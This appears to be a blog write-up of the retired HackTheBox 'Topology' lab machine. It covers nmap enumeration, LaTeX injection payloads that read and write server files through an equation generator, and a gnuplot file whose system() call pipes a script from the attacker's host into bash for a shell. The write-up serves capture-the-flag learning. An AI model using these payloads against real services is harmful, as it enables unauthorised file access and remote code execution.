Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
HackTheBox - Topology
|htbmachinesretired|

Hackthebox - Topology

Machine ID: 546

tags: hackthebox linux easy

Initial Enumeration

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# Nmap 7.93 scan initiated Sun Jun 11 19:01:25 2023 as: nmap -sC -sV -oN nmap/topology 10.10.11.217
Nmap scan report for 10.10.11.217
Host is up (0.053s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 dcbc3286e8e8457810bc2b5dbf0f55c6 (RSA)
|   256 d9f339692c6c27f1a92d506ca79f1c33 (ECDSA)
|_  256 4ca65075d0934f9c4a1b890a7a2708d7 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Miskatonic University | Topology Group
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 11 19:01:40 2023 -- 1 IP address (1 host up) scanned in 14.83 seconds

Web

We find a potential users as lklein vdasisley abd dabrahams

We also see a subdomain as latex.topology.htb

Visiting Latex Equation Generator we ee this.

And Visting the index we see directory listing is enabled

Checking the logs file we see we are using pdfTeX, Version 3.14159265-2.6-1.40.20

Trying Injection on that we get

1
2
3
4
5
\newread\file
\openin\file=/usr/share/texmf/web2c/texmf.cnf
\read\file to\line
\text{\line}
\closein\file

Trying WriteFile also lead to 

1
2
3
4
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile

Running a command and monitoring /tempfiles we se

Trying to use fileConetnts to write to a file

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
\documentclass{article}

\begin{document}

% Start the filecontents environment with the desired file name
\begin{filecontents*}{myFile.txt}
This is the content of my file.
It can have multiple lines.
\end{filecontents*}

% Some text in the document
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam eu justo nec elit ullamcorper semper eget a lectus.

\end{document}

we get input too long

1
2
3
\begin{filecontents*}{myFile.txt}
Content of the file.
\end{filecontents*}

Using this file is created but blank

After trying the same locally we figure out that newline is mandatory

So we urlencode the payload and we can write to a file

and can run command

Ref: https://texdoc.org/serve/latex2e.pdf/0

www-data Shell

Privilege Escalation

Running pspy64 we see

We create a plt file as

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
set encoding iso_8859_1
set key right bottom #font "Helvetica,17" 
set ylabel "Lookup error probability" font "Helvetica,17"
set xlabel "Hight of the reader (m)" font "Helvetica,17"
set xtics font "Helvetica,15"
set ytics font "Helvetica,15"
set size 0.75, 1.05
set terminal postscript eps enhanced color #"Helvetica" 16 #size 3.5in,3in
set grid 
set key spacing 1.5

set output "ProbError6x6.eps"
list(start,end,increment)=system(sprintf("seq %g %g %g", start, increment, end))

system("curl http://10.10.14.22:8000/shell.bash | bash")
Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/topology/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
linuxwriteupretiredhacktheboxeasy